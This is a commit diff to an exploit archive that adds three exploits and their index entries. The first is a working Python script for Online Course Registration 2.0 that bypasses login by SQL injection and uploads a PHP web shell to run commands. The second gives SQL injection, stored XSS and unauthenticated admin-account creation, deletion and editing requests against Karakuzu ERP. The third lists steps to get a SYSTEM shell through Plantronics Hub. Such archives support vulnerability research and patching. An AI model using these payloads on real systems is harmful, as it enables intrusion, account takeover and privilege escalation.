DB: 2020-01-04

3 changes to exploits/shellcodes Plantronics Hub 3.13.2 - Local Privilege Escalation Online Course Registration 2.0 - Remote Code Execution Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
2020-01-04 05:01:56 +00:00 · 2020-01-04 05:01:56 +00:00 · 975e7769c7
commit 975e7769c7
parent 3b67743b55
4 changed files with 258 additions and 0 deletions
--- a/exploits/php/webapps/47843.txt
+++ b/exploits/php/webapps/47843.txt
@ -0,0 +1,145 @@
+# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-course-registration-free-download/
+# Version: v2.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+Attacker can bypass login page and access to student change password dashboard.
+
+PoC Request (Authentication Bypass):
+
+POST /onlinecourse/index.php HTTP/1.1
+Host: target
+
+regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=
+
+
+There isn't any file extension control in student panel "My Profile" section.
+An unauthorized user can upload php file as profile image.
+
+First PoC Request (RCE):
+
+POST /onlinecourse/my-profile.php HTTP/1.1
+Host: target
+
+-----------------------------16046344889164047791563222514
+Content-Disposition: form-data; name="photo"; filename="simple.php"
+Content-Type: application/x-php
+
+<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>
+
+
+Second PoC Request (RCE):
+
+GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
+Host: target
+
+
+Below basic python script will bypass authentication and execute command on target server.
+
+
+
+
+
+import requests
+import sys                        
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+print "[*] Usage: PoC.py rhost/rpath "
+print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
+exit(0)
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/index.php"
+data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+#bypass authentication
+lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+#check authentication bypass
+check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
+if check.status_code == 200:
+print "[+] Authentication bypass was successfull"
+else:
+print "[-] Authentication bypass was unsuccessful"
+sys.exit()
+
+#upload simple php file
+
+files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
+fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
+furl = "http://"+rhost+"/my-profile.php"
+session.post(url=furl, files= files, data=fdata)
+
+#execution
+final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)
+
+#check execution
+if final.status_code == 200:
+print "[+] Command execution completed successfully."
+print "\tPut on a happy face!\n"
+else:
+print "[-] Command execution was unsuccessful."
+sys.exit()
+
+print final.text
+
+online-course-registration-rce.png
+
+poc.py
+
+import requests
+import sys                         
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath "
+	print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
+	exit(0) 
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/index.php"
+data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	#bypass authentication
+	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	
+	#check authentication bypass
+	check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
+	if check.status_code == 200:
+		print "[+] Authentication bypass was successfull"
+	else:
+		print "[-] Authentication bypass was unsuccessful"
+		sys.exit()	 
+
+	#upload simple php file
+
+	files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
+	fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
+	furl = "http://"+rhost+"/my-profile.php"
+	session.post(url=furl, files= files, data=fdata)
+	
+	#execution
+	final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)
+
+	#check execution
+	if final.status_code == 200:
+		print "[+] Command execution completed successfully.\n"
+		print "\tPut on a happy face!\n"
+	else:
+		print "[-] Command execution was unsuccessful."
+		sys.exit()
+
+	print final.text
--- a/exploits/php/webapps/47844.txt
+++ b/exploits/php/webapps/47844.txt
@ -0,0 +1,91 @@
+# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
+# Discovery Date: 2019-09-20
+# Exploit Author: Hakan TAŞKÖPRÜ
+# Vendor Homepage: http://karakuzu.info/
+# Effected Version <= 5.7.0
+
+Vulnerability #1: Unauthenticated SQL Injection
+==================================================
+
+Type: Error-based
+Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
+Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND
+1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT
+(CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM
+DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))--
+DhDH&k_yetki_duz=USER&kullanici_duzenle=
+
+Type: Time-based blind
+Title: Oracle AND time-based blind
+Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND
+6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)--
+VuHD&k_yetki_duz=USER&kullanici_duzenle=
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=
+Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and
+k_sifre_duz parameters are injectable/vulnerable.
+
+Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User
+Management Panel
+=======================================================================================
+Description : An attacker can stole an admin’s cookie.
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)"
+autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=
+
+Vulnerability #3: Unauthenticated Creating Admin User
+======================================================
+Description : An attacker can create an admin or normal account.
+
+Request:
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=
+
+Vulnerability #4: Unauthenticated Deleting User
+=============================================
+Description : An attacker can delete an admin or normal account.
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+kullanici_sil=k_adi_duz=USERNAME_TO_DELETE
+
+Vulnerability #5: Unauthenticated Editing User
+===============================================
+Description : An attacker can change a user’s password or role(e.g ROOT).
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle=
+
+### History
+=============
+2019-09-20  Issue discovered
+2019-11-19  Vendor contacted (No response)
+2020-01-03  Issue published
--- a/exploits/windows/local/47845.txt
+++ b/exploits/windows/local/47845.txt
@ -0,0 +1,19 @@
+# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation
+# Date: 2020-01-2
+# Exploit Author: Markus Krell - @MarkusKrell
+# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf
+# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe
+# Version: Plantronics Hub for Windows prior to version 3.14
+# Tested on: Windows 10 Enterprise
+# CVE : N/A
+
+As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner:
+<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>
+
+Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. 
+You may of course call any other binary you can plant on the machine.
+
+Steps for exploitation (PoC):
+- Open cmd.exe 
+- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
+- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10861,6 +10861,7 @@ id,file,description,date,author,type,platform,port
 47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
 47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
+47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42147,3 +42148,5 @@ id,file,description,date,author,type,platform,port
 47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,
 47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
+47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
+47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,